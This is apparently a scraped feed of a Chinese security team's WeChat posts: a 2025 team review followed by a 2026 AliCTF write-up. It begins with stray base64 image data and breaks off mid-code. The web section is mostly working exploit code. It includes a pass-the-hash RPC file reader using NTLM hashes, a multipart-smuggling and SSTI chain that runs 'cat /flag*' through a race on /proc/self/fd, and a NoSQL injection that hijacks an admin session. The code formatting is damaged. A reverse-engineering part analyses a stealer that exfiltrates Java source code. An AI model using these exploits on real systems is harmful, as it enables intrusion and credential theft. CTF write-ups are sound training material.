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
base64 的 png 图片：
EH4X{baby_U4rt}

painter

Usb 鼠标流量分析：

结束

招新小广告

ChaMd5 Venom 招收大佬入圈

新成立组IOT+工控+样本分析长期招新

欢迎联系admin@chamd5.org

跳转微信打开

2025年ChaMd5安全团队总结

Thu, 12 Feb 2026 08:01:00 +0800

原创 M 2026-02-12 08:01 吉林

我们讲继续努力发展各个小组的优势，变的更强

2026年已然来临。实际上，我们团队早已是安全领域的老牌安全团队，无需过多展示过往成绩。毕竟，许多业界大佬已退居幕后或晋升至管理层，对他们而言，这些外在的彰显或许已不再重要。然而，仍有众多团队成员在为了特定的目标方向不懈拼搏。凭借他们的努力，团队每年都揽下不少项目。为了证明我们依旧活跃于行业之中，在此，还是向大家展示一下过去一年取得的成果。

运营组（公众号）

发布文章共计 67 篇，其中技术文章 47 篇，有一大部分文章是由 CTF 组的 WP 贡献，其中病毒分析15篇、AI研究方向2篇、IoT安全方向1篇、工控安全方向1篇，公众号文章来源于团队的大佬师傅们，感谢他们辛苦的付出，一直坚持给大家更新前言的技术文章，感谢投稿的师傅们，继续加油，下面展示热度比极高的文章Top10。

HGAME2025杭州电子科技大学网络攻防大赛 PWN writeup

白加黑银狐样本分析

2024年ChaMd5安全团队总结

首届CCF智能汽车大赛(CCF IVC 2025) Mini-Venom(第一名)

旧瓶装旧酒：银狐最新样本分析

安全招聘汇总 | 2025年第一期

CVE-2025-4076 BL-Link远程代码执行漏洞挖掘

2025强网杯-车联网赛道 writeup by Mini-Venom

浅析流行银狐样本

第二届“Parloo 杯”-CTF应急响应挑战赛 writeup by Mini-Venom

NFC银行卡信息窃取样本分析

SRC组

2025年喜马拉雅SRC年度第六名(kk)
2025年京东SRC年度第五名(Str1am_)健康隐私妙手
2025年京东SRC年度第八名(N4vol)
2025年京东SRC“优秀合作伙伴”称号

CTF组

2025鹏程杯线下优胜奖
2025年首届CCF智能汽车大赛线上第一名、线下三等奖
2025年CCF智能汽车大赛三等奖
2025年DASCTF 2025上半年赛第八名
2025年DASCTF 2025下半年赛第四名
2025第一届OpenHarmonyCTF专题赛第五名
2025年第八届封神台第一名
2025XYCTF三等奖

H1国外组

BBP:
Hilton Top 5
2025 Visa Main Top 5
Chrome VRP 2025 Top researcher Top 10
BMW Group Top 10
2025 Hackerone(BBP) China Top 5
2025 Hackerone(BBP) China Top 10 *2
2025 Hackerone(BBP) China Top 20
intigriti leaderboard (all time) Top 100
intigriti leaderboard (all time) Top 200
intigriti leaderboard (all time) Top 300

CVE编号:
CVE-2024-57707
CVE-2025-53865

厂商致谢：
International Red Cros
Microsoft Security Response Center dji（https://security.dji.com/zh/post/announcement-33）

IoT组

2025年网古杯一等奖

团队人员发表IoT领域网络安全顶级期刊或会议多篇（NDSS, USENIX, TDSC等）

包括CVE-2025-25740, CVE-2025-25741, CVE-2025-25742, CVE-2025-25743, CVE-2025-25744, CVE-2025-25745, CVE-2025-25746，CNVD-2025-21918，CNVD-2025-21917，CNVD-2025-09549，CNVD-2025-08689，CNVD-2025-05920，CNVD-YCGN-202507008648等

Car组

首届CCF智能汽车大赛(CCF IVC 2025) 二等奖

The AutoPEPS 2025智能汽车无钥匙进入大会《智能网联合汽车攻防实践》
天网杯议题分享《智能网联汽车安全：从车控攻击到车型认证》

AI组

2025 LLM指令遵循攻防赛第1名一等奖
2025 DataCon AI安全赛道第14名，三等奖

腾讯安全沙龙第2期（西安站）《ltrack - Security Observability Framework for ML/AI Model File Loading》

奇御AI安全技术沙龙《ML/AI 模型文件加载后门及可观测框架》

GIAC大模型赋能下一代AI安全分会场《YJ-SOC 基于 CVE 漏洞的开源项目安全监控与智能告警系统》

广西网信办网络安全攻防技术交流活动《人工智能赋能的智能化漏洞复现》

白帽大会《当AI成为自己的红队:自动化越狱样本构造方法》

XCon X HackingGroup国际黑客马拉松网络安全会议《AI数字人生态攻防》

2025年首站补天白帽黑客城市沙龙-西安站《AIGC 安全实践：AI Red Teaming》

产品介绍

CTFIoT网站（https://www.ctfiot.com/blog）

主要IoT安全、车联网安全、工控安全、AI安全、区块链安全等方向，也专门在群内每天进行早报推送，数量现在有点多就不统计了，也欢迎发送好文给邮件admin@chamd5.org进行收录。

ChaMd5招聘网站（http://www.chamd5.org/jobs.aspx）

依旧为大家持续发送招聘。

CTFHub

新增用户27021个

全部用户全年合计开启环境321903个，平均每天开启882个

全部用户合计完成技能346344个，平均每天完成949个

全部用户合计完成真题10791个

全部用户合计获得经验1793800点

全部用户合计关注赛事337个

全年用户合计签到114044次，其中网站签到81295次，微信公众号签到32749次

全部用户通过签到获得金币2421349个

全部用户通过完成题目及技能获得金币12679190个

全年更新赛事信息369个

最受欢迎的工具类型Web/Misc/暴力破解/SQL注入/抓包/隐写/Reverse

最受环境的环境类型Web/Misc/SQL注入/Crypto/网鼎杯/Reverse

至今最长打卡记录@3w4ter累计打卡2166天，自上线至今从未断签

SecReport

社区版私有化部署已突破 1,000+SecReport 官网已帮助 10,000+人创建 20,000+报告

三大运营商公司级红队与项目交付场景中持续运行

国内期货交易所下属安全公司的实战项目交付中落地验证

SecAutoBan

私有化部署已超过 2,000+

关联分析与去噪：动作基于证据与策略，而不是基于“告警数量”

自动封禁 + 自动解禁：完整闭环，避免“一封了之”的副作用

全链路审计与可回滚：每次处置都有依据、记录与回滚路径

幂等与容错优先：面向长期稳定运行，而不是复杂流程堆叠

团队书

2025年机械工业出版社合作伙伴“共生奖”

2025年新书

《物联网漏洞挖掘与利用》

感谢参与本书编辑的Vinadiak(叶振涛) 、fxc233(费新程)、天气预报 (唐君毅)、春秋代序、ZoE、ana、Gir@ffe (李俊岑)、满眼星光、we8 (闫俊)。

《汽车网络安全工程手册》

感谢参与本书编辑的badmonkey（侯荣锋）、xyzper（曲毅）、Licae（卢太学）、Vinadiak（叶振涛）。

《红队实战指南：AI驱动的渗透测试、红队评估和漏洞挖掘》

感谢参与本书编辑的L1n3 (袁伟)、bayuncao (宁宇飞)、Z师傅、张澳海、T师傅。

过审中

《Armv8-A系统逆向工程》

感谢参与本书编辑的刘明嘉、山成伟、吴瑞欣、胡志元。

《智能持续安全：基于人工智能的安全防护》

感谢参与本书编辑的Moonfish、Medicean、从前有座山、IT小丑、Trim。

编写中

《MCP进阶实战》

Mini-Venom加入条件: 欢迎大二以下/大二以上但有考研打算/已保研的同学（总的来说就是可以保证比赛时间）投递简历！请尽可能详细介绍自己，以加入对应的组哦。申请接收邮箱：admin@chamd5.org

最后大家喜欢的福利抽奖啦！
我们仅需要你：
1.关注ChaMd5安全团队公众号
2.于2026.2.16早上8点之前转发本条推文至朋友圈（凭转发截图兑奖，开奖前删除无效）
3.点击抽奖小程序进行抽奖

阅读原文

跳转微信打开

2026阿里CTF Writeup by Mini-Venom

Wed, 04 Feb 2026 08:03:00 +0800

原创 Mini-Venom 2026-02-04 08:03 吉林

Web:

Backup Exec

信息收集：通过FTP匿名访问（端口21），在 microsoft/results.txt 发现了攻击者之前使用mimikatz进行DCSync攻击导出的凭据

凭据提取：从DCSync输出中提取了多个服务账户的NTLM哈希，包括：

svc_patching: 6047e67e4d35700cb437664b02615f29

svc_fileshare: 02c5257056442b3ba003fbe6c228b95b (Server Backup Operators组成员)

svc_dbbackup: eb2c652c8e8bfeed348d66ffa98be0d1

二进制分析：逆向分析 BEFileDaemon.exe 发现：

RPC接口UUID: 62e00289-44bd-497b-b85f-bc340fbcc2b0 v1.0

端口: 62831

授权检查：需要 IT-BackupAdmins 组成员 (SID: S-1-5-21-3223156632-3195994233-1317593892-1624)

需要PKT_PRIVACY认证等级

数据使用16字节XOR密钥加密

利用：使用 svc_fileshare 账户通过Pass-the-Hash认证，调用RPC接口读取管理员桌面的flag.txt文件

#!/usr/bin/env python3"""
Backup Exec RPC Exploit - Raw Request Version
"""import struct
from impacket import uuid
from impacket.dcerpc.v5 import transport, rpcrt
# XOR Key for decryption
XOR_KEY = bytes([0x2a, 0x7f, 0xc3, 0x91, 0x5e, 0x34, 0x8b, 0x19,
0xd2, 0x67, 0xf4, 0x28, 0xab, 0x76, 0x43, 0x9d])
defxor_decrypt(data):
    result = bytearray(len(data))
for i in range(len(data)):
        result[i] = data[i] ^ XOR_KEY[i % 16]
return bytes(result)
defbuild_open_file_request(filepath):
"""Build raw NDR request for OpenRemoteFile"""
# WSTR is: max_count (4) + offset (4) + actual_count (4) + data (unicode)
    filepath_unicode = filepath.encode('utf-16-le') + b'\x00\x00'# null terminated
    char_count = len(filepath) + 1# include null terminator
# Conformant varying string: max_count, offset, actual_count, data
    request = struct.pack(', char_count)  # max_count
    request += struct.pack(', 0)           # offset
    request += struct.pack(', char_count)  # actual_count
    request += filepath_unicode
# Pad to 4-byte boundary
while len(request) % 4 != 0:
        request += b'\x00'
return request
defbuild_read_file_request(file_handle, offset, bytes_to_read):
"""Build raw NDR request for ReadFileData"""
# Context handle (20 bytes) + ulOffset (4) + ulBytesToRead (4)
    request = file_handle  # 20 bytes context handle
    request += struct.pack(', offset)
    request += struct.pack(', bytes_to_read)
return request
defbuild_close_file_request(file_handle):
"""Build raw NDR request for CloseFileHandle"""
return file_handle  # Just the context handle
defmain():
    target = '116.62.114.4'
    port = 62831
    domain = 'CORP.LOCAL'
    username = 'svc_fileshare'
    nthash = '02c5257056442b3ba003fbe6c228b95b'
    INTERFACE_UUID = uuid.uuidtup_to_bin(('62e00289-44bd-497b-b85f-bc340fbcc2b0', '1.0'))
    target_file = r'C:\Users\Administrator\Desktop\flag.txt'
    print('=' * 60)
    print('Backup Exec RPC Exploit - Raw Version')
    print('=' * 60)
# Connect
    stringbinding = f'ncacn_ip_tcp:{target}[{port}]'
    print(f'[*] Connecting to {stringbinding}')
    rpctransport = transport.DCERPCTransportFactory(stringbinding)
    rpctransport.set_credentials(username, '', domain, lmhash='', nthash=nthash)
    dce = rpctransport.get_dce_rpc()
    dce.set_auth_level(rpcrt.RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
try:
        dce.connect()
        print('[+] Connected!')
        dce.bind(INTERFACE_UUID)
        print('[+] Bound to interface!')
except Exception as e:
        print(f'[-] Connection failed: {e}')
return
# Build and send OpenRemoteFile request (opnum 0)
    print(f'[*] Opening file: {target_file}')
    request_data = build_open_file_request(target_file)
    print(f'[DEBUG] Request ({len(request_data)} bytes): {request_data.hex()}')
try:
        dce.call(0, request_data)  # opnum 0 = OpenRemoteFile
        resp = dce.recv()
if resp isNone:
            print('[-] No response received')
return
        print(f'[+] Got response ({len(resp)} bytes)')
        print(f'[DEBUG] Response: {resp.hex()}')
# Parse response: context_handle (20) + padding(4) + file_size (8) + error_code (4) + return_value (1)
if len(resp) >= 37:
            file_handle = resp[0:20]
# Skip 4 bytes padding
            file_size = struct.unpack(', resp[24:32])[0]
            error_code = struct.unpack(', resp[32:36])[0]
            ret_val = resp[36]
            print(f'[*] Return value: {ret_val}')
            print(f'[*] Error code: {error_code}')
            print(f'[*] File size: {file_size}')
            print(f'[*] Handle: {file_handle.hex()}')
if ret_val == 1:
                print('[+] File opened successfully!')
# Read file content
                content = b''
                offset = 0
                chunk_size = 4096
while offset < file_size:
                    to_read = min(chunk_size, file_size - offset)
                    read_request = build_read_file_request(file_handle, offset, to_read)
                    dce.call(1, read_request)  # opnum 1 = ReadFileData
                    read_resp = dce.recv()
if read_resp isNone:
                        print('[-] No response for ReadFileData')
break
                    print(f'[DEBUG] ReadFileData response ({len(read_resp)} bytes): {read_resp.hex()}')
# Parse: max_count(4) + offset(4) + actual_count(4) + data + bytes_read(4) + error(4) + ret(1)
                    max_count = struct.unpack(', read_resp[0:4])[0]
                    actual_count = struct.unpack(', read_resp[8:12])[0]
                    data = read_resp[12:12+actual_count]
# Find bytes_read after data (aligned to 4)
                    data_end = 12 + actual_count
if data_end % 4 != 0:
                        data_end += 4 - (data_end % 4)
                    bytes_read = struct.unpack(', read_resp[data_end:data_end+4])[0]
                    print(f'[DEBUG] max_count={max_count}, actual_count={actual_count}, bytes_read={bytes_read}')
if bytes_read > 0:
                        decrypted = xor_decrypt(data[:bytes_read])
                        content += decrypted
                        offset += bytes_read
                        print(f'[*] Read {offset}/{file_size} bytes')
else:
break
                print()
# Close file
                close_request = build_close_file_request(file_handle)
                dce.call(2, close_request)  # opnum 2 = CloseFileHandle
                print('[*] File closed')
# Print content
                print('=' * 60)
                print('FLAG CONTENT:')
                print('=' * 60)
try:
                    print(content.decode('utf-8'))
except:
try:
                        print(content.decode('utf-16-le'))
except:
                        print(content)
                print('=' * 60)
else:
                print(f'[-] Failed to open file, error: {error_code}')
else:
            print(f'[-] Unexpected response length: {len(resp)}')
except Exception as e:
        print(f'[-] Error: {e}')
import traceback
        traceback.print_exc()
finally:
        dce.disconnect()
if __name__ == '__main__':
    main()

cutter

通过对后端的app.py进行审计，

heartbeat 是个action的代理，虽然说有吧action的 type写成固定为echo，但headers[client]部分还是可以设置请求的http头，通过这里可以进行Multipart 注入

action 中，当type为debug时能解析格式化输出的表达式，通过这里可以泄露出系统的API_KEY

然后是admin部分，需要先获取API_KEY才能进入这段逻辑

代码中存在SSTI漏洞，模板的路径没有做过滤，是可以读取任意文件并进行SSTI

结合以上内容，大致路径如下：

通过heartbeat对action部分进行代理请求

A. 覆盖 Content-Type

/heartbeat 允许用户控制部分 Headers：

    headers[client] = token

攻击者发送参数：

client : Content-Type
token : multipart/form-data; boundary=FlagBoundary

这使得 httpx 发出的请求的 Content-Type Header 变成了我们指定的 boundary=FlagBoundary ，而不是 httpx 自动生成的随机 boundary。

B. 构造 Payload (Multipart Smuggling)

攻击者在 text 参数（对应 content 字段）中注入了伪造的 Multipart 结构：

{0.config}
--FlagBoundary
Content-Disposition: form-data; name="action"; filename="action"
Content-Type: text/json
{"type": "debug"}
--FlagBoundary

C. 最终效果
当 httpx 发送请求时，它以为自己在发送正常的 content 和 action (echo)。但由于 Header 被篡改为使用 FlagBoundary ，接收端 ( /action 的 Flask 服务器) 会按照 FlagBoundary 来切分数据。
接收端看到的视图：
Part 1 (content) :
内容: {0.config} (这是我们的格式化字符串 Payload)
(后面原本属于 content 的部分被我们的伪造 boundary 切断了)
Part 2 (action) :
内容: {"type": "debug"}
Part 3 (Original action) :
这是 httpx 原本生成的 action (echo)，但在我们的注入之后，它变成了多余的数据或者被忽略。

通过格式化输出获取API_KEY
然后通过admin读取模板进行SSTI

就是最后一步模板应该怎么读取？我们好像无法直接上传文件

那么可以通过Linux中 /proc/self/fd/* 去读取请求体的内容，原因是在进行请求时，会在服务器进程的文件描述符 (File Descriptor, FD) 中暂存请求体内容

结合这些内容，脚本如下

import socket
import time
import threading
import httpx
import sys
import re
import random
# Configuration
TARGET_HOST = "223.6.249.127"
TARGET_PORT = 37767
TARGET_URL = f"http://{TARGET_HOST}:{TARGET_PORT}"
# Global API_KEY variable
API_KEY = None
# Payload to execute via SSTI
PADDING_SIZE = 1024 * 1024 * 1# 1MB padding
# PAYLOAD = "{{config.__class__.__init__.__globals__['os'].popen('cat /flag*').read()}}"
# Try to list root directory first to be sure
PAYLOAD = "{{config.__class__.__init__.__globals__['os'].popen('cat /flag*').read()}}"
defleak_api_key():
"""Leaks the API_KEY using the format string vulnerability."""
    print("[*] Leaking API_KEY...")
    url = f"{TARGET_URL}/heartbeat"
    fmt_payload = "{0.view_functions[index].__globals__[API_KEY]}"
    boundary = "FlagBoundary"
    injected_body = (
f"{fmt_payload}\r\n"
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="action"; filename="action"\r\n'
f"Content-Type: text/json\r\n"
f"\r\n"
f'{{"type": "debug"}}\r\n'
f"--{boundary}"
    )
    params = {
"client": "Content-Type",
"token": f"multipart/form-data; boundary={boundary}",
"text": injected_body
    }
try:
        r = httpx.post(url, data=params, timeout=10)
if r.status_code == 200:
             key = r.text.strip()
             print(f"[+] API_KEY found: {key}")
return key
else:
            print(f"[-] Failed to leak API_KEY. Status: {r.status_code}")
            print(f"[-] Response: {r.text[:200]}")
except Exception as e:
        print(f"[!] Error leaking API_KEY: {e}")
returnNone
defkeep_alive_upload(api_key):
"""Performs the slow upload attack to keep a temporary file alive."""
whileTrue:
try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((TARGET_HOST, TARGET_PORT))
            boundary = "------------------------Boundary1234567890"
            part1 = (
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="text"\r\n\r\n'
f"ping\r\n"
            )
            part2 = (
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="client"\r\n\r\n'
f"X-Token\r\n"
            )
            part3 = (
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="token"\r\n\r\n'
f"{api_key}\r\n"
            )
            part4_header = (
f"--{boundary}\r\n"
f'Content-Disposition: form-data; name="garbage"; filename="pwn.txt"\r\n'
f"Content-Type: text/plain\r\n\r\n"
            )
            content_length = len(part1) + len(part2) + len(part3) + len(part4_header) + PADDING_SIZE + len(PAYLOAD) + len(f"\r\n--{boundary}--\r\n")
            request_header = (
f"POST /heartbeat HTTP/1.1\r\n"
f"Host: {TARGET_HOST}:{TARGET_PORT}\r\n"
f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
f"Content-Length: {content_length}\r\n"
f"Connection: keep-alive\r\n"
f"\r\n"
            )
            s.send(request_header.encode())
            s.send(part1.encode())
            s.send(part2.encode())
            s.send(part3.encode())
            s.send(part4_header.encode())
# Send payload first so it's at the beginning of the file
            s.send(PAYLOAD.encode())
            chunk_size = 1024
            sent = 0
# Slow send loop
while sent < PADDING_SIZE:
                s.send(("A" * chunk_size).encode())
                sent += chunk_size
                time.sleep(0.005) 
            s.send(f"\r\n--{boundary}--\r\n".encode())
            s.close()
except Exception as e:
pass
        time.sleep(0.1)
defrace_worker(api_key):
"""Worker thread that tries to hit the LFI."""
    url = f"{TARGET_URL}/admin"
    headers = {"Authorization": api_key}
whileTrue:
# Scan range of FDs
for fd in range(3, 40):
try:
                params = {"tmpl": f"/proc/self/fd/{fd}"}
                r = httpx.get(url, headers=headers, params=params, timeout=2)
                print(r.text[:20])
# Use regex to find flag
                flag_match = re.search(r"alictf\{.*?\}", r.text)
print
if"alictf{"in r.text:
                    flag = flag_match.group(0)
                    print(f"\n[!!!] HIT FLAG! FD: {fd}")
                    print(f"Flag: {flag}")
# Write to file just in case
with open("flag.txt", "w") as f:
                        f.write(flag)
import os
                    os._exit(0) # Force exit all threads
elif"root"in r.text and"bin"in r.text:
                      print(f"\n[!!!] HIT Content (but no flag)! FD: {fd}")
                      print(f"Response snippet: {r.text[:200]}")
except:
pass
if __name__ == "__main__":
# 1. Leak API Key
    API_KEY = leak_api_key()
ifnot API_KEY:
        print("[-] Could not leak API_KEY. Exiting.")
        sys.exit(1)
    print("[*] Starting slow upload threads...")
# 2. Start Slow Upload Threads
for _ in range(2):
        t = threading.Thread(target=keep_alive_upload, args=(API_KEY,), daemon=True)
        t.start()
    print("[*] Starting race LFI threads...")
# 3. Start Race LFI Threads
for _ in range(20):
        t = threading.Thread(target=race_worker, args=(API_KEY,), daemon=True)
        t.start()
    print("[*] Waiting for flag... (Ctrl+C to stop)")
try:
whileTrue:
            time.sleep(1)
except KeyboardInterrupt:
        print("[*] Exiting.")

Easy Login

由于题目环境中的 sid 并没有通过 httpOnly: true 保护，且后端使用了 MongoDB 处理 Session，最简单的解法不是复杂的 XSS/XS-Leak，而是利用 NoSQL 注入直接劫持管理员会话。

脚本如下

import requests
import string
TARGET_URL = "http://223.6.249.127:29558"
defsolve():
# --- 场景 A：如果你已经有了已知的 sid ---
    know_sid = "7cce9e910e6acd7f0104e4abd2dae8ea"
    print(f"[*] Testing with provided sid: {know_sid}")
    res = requests.get(f"{TARGET_URL}/admin", cookies={'sid': know_sid})
if"alictf{"in res.text or"flag{"in res.text:
        print("[+] Direct Login Success!")
        print(res.text)
return
# --- 场景 B：利用 NoSQL 注入爆破管理员的 sid ---
    print("[*] Starting NoSQL Blind Injection to leak Admin sid...")
# 1. 先触发一次 visit，确保 admin 登录并产生了新的 session
try:
        requests.post(f"{TARGET_URL}/visit", json={"url": "http://example.com"}, timeout=5)
except:
pass
    leaked_sid = ""
# sid 是 16字节 hex，即 32 个字符
    chars = string.digits + "abcdef"
for _ in range(32):
        found = False
for char in chars:
            test_sid = leaked_sid + char
# 利用 cookie-parser 的 j: 特性传入 MongoDB 查询对象
# 查询 sid 以 test_sid 开头的记录
            cookies = {
'sid': f'j:{{ "$regex": "^{test_sid}" }}'
            }
try:
# 访问 /me 看看当前 session 匹配到的是不是 admin
                response = requests.get(f"{TARGET_URL}/me", cookies=cookies).json()
if response.get('loggedIn') and response.get('username') == 'admin':
                    leaked_sid += char
                    print(f"[+] Leaking sid: {leaked_sid}")
                    found = True
break
except Exception as e:
continue
ifnot found:
            print("[-] Could not leak more characters.")
break
if leaked_sid:
        print(f"[*] Final Admin SID: {leaked_sid}")
# 最后用拿到的 sid 请求 flag
        final_res = requests.get(f"{TARGET_URL}/admin", cookies={'sid': leaked_sid})
        print("[+] Result:")
        print(final_res.text)
if __name__ == "__main__":
    solve()

Reverse:

Thief

它模拟了一个窃密木马（Thief）从手机中扫描、加密、压缩并外传 Java 源代码的全过程。

第一阶段：资源伪装与环境准备（静态分析）

伪装入口：题目给出的 Android 项目中，res/mipmap 目录下有很多数字命名的 .webp 文件（如 f5e568c9...webp）。
本质识别：这些 .webp 资源文件头为 CAFEBABE，实际是伪装的 Java .class。通过解析 constant pool 获取 internal name，重建包路径后即可直接加载/反射调用其中的逻辑。
动态加载：木马通过 MainActivity（表面看起来是空的）或者 Native 层，利用 DexClassLoader 动态加载这些 .webp 文件中的代码。
功能定位：

**扫描器 (C0003L)**：负责递归遍历手机目录，寻找所有以 .java 结尾的源代码文件。
**配置类 (ConstantPool)**：通过复杂的位运算混淆，存储了加密算法所需的常量、指令和“Native”等关键词。

第二阶段：数据处理流水线（核心算法）

当木马找到一个 .java 文件后，会依次经过以下三个模块处理：

虚拟机加密 (Runner.encrypt)

这是这道题最难的“黑盒”。它实现了一个 **自定义虚拟机 (VM)**：

它接收 8 字节随机 Key、IV 以及一组长长的 Base64 指令（存储在常量池中）。
它将原始 Java 代码作为“数据”，在自定义指令集的驱动下进行置换、移位等变换。
对称性：算法是对称的。这意味着如果你能再次调用这个 encrypt 函数并传入相同的 Key/IV，密文就会还原成原文。

自定义压缩 (Il1.LZRR)

为了减少流量体积，加密后的数据会被送入压缩引擎：

算法：实现了一个名为 LZRR的自定义 LZ77 算法。
特征：“压缩块以 4C 5A 52 52（LZRR）开头，包含 version/mode/origLen/crc32，后续为 bitstream（mode=15 时还会先经过 RLE 层）。
校验：包含一个 CRC32 校验码（由硬编码的 0xEDB88320 多项式表生成）。

协议封装 (l1I.java)

最后，数据被打包成外传格式：

Key 保护：生成 8 字节随机 Session Key，并使用 RSA-2048公钥加密。
打包：将 RSA 加密后的 Key、被异或（XOR 233）的文件名、压缩后的 Payload 拼接在一起。
文件头：添加 89 61 6C 69 ("\x89ali") 作为整个封包的起始标志。

第三阶段：网络外传（流量包分析）

数据外泄：木马通过 Socket 将打包好的二进制流发送到远端服务器（流量包中的 data0, data1, data2）。
特征观察：

文件开头是 00 00 00 00（填充）+ 89 61 6C 69（魔数）。
文件头包含 256/257 字节的 RSA 块。
奇数 batch 走 algo3，输出对 key 不敏感（可视为 keyless），因此尝试用 key-bit 基向量求解时会出现 rank=0；偶数 batch 才使用依赖 key 的 algo2，需要用已知明文恢复 keystream/密钥，总共有三个batch。

整道题的解法如下：

每个 batch 的 3 个文件里 第一个文件是“已知源码文件”（工程里存在同名文件）

客户端外传前会先对每个文件调用 Il1.Il1() 压缩成 LZRR

所以我们可以本地调用同一个压缩器得到完全一致的明文块 P_known

对应抓包里的密文块 C_known

于是 keystream可以直接得到：

KS=C_known⊕P_known

从而绕过 RSA

用 keystream / 或恢复的 key 解密 encrypted_blob 得到拼接明文 blob

按 offset 切成 3 个 LZRR 块

对每个 LZRR 解压得到原始文件 bytes

就能解出图片

解密脚本如下：

CTFHelper.java

import java.io.*;
import java.lang.reflect.Method;
import java.nio.file.*;
import java.util.*;
publicclassCTFHelper{
//private static byte[] Il1(byte[] data, byte[] key, int idx)
staticbyte[] crypt(byte[] data, byte[] key8, int batchIdx) throws Exception {
        Class cls = Class.forName("i.l.l1I");
        Method m = cls.getDeclaredMethod("Il1", byte[].class, byte[].class, int.class);
        m.setAccessible(true);
return (byte[]) m.invoke(null, data, key8, batchIdx);
    }
// i.l.Il1.Il1(byte[])：LZRR
staticbyte[] lzrrCompress(byte[] plain) throws Exception {
        Class cls = Class.forName("i.l.Il1");
        Method m = cls.getDeclaredMethod("Il1", byte[].class);
        m.setAccessible(true);
return (byte[]) m.invoke(null, plain);
    }
staticbyte[] hexToBytes(String hex) {
if (hex.length() % 2 != 0) thrownew IllegalArgumentException("hex length must be even");
byte[] out = newbyte[hex.length() / 2];
for (int i = 0; i < out.length; i++) {
            out[i] = (byte) Integer.parseInt(hex.substring(2*i, 2*i+2), 16);
        }
return out;
    }
staticvoidwriteAll(String path, byte[] data)throws IOException {
        Path p = Paths.get(path);
        Files.createDirectories(p.getParent() == null ? Paths.get(".") : p.getParent());
        Files.write(p, data);
    }
staticbyte[] readAll(String path) throws IOException {
return Files.readAllBytes(Paths.get(path));
    }
staticbyte[] xor(byte[] a, byte[] b) {
byte[] out = newbyte[a.length];
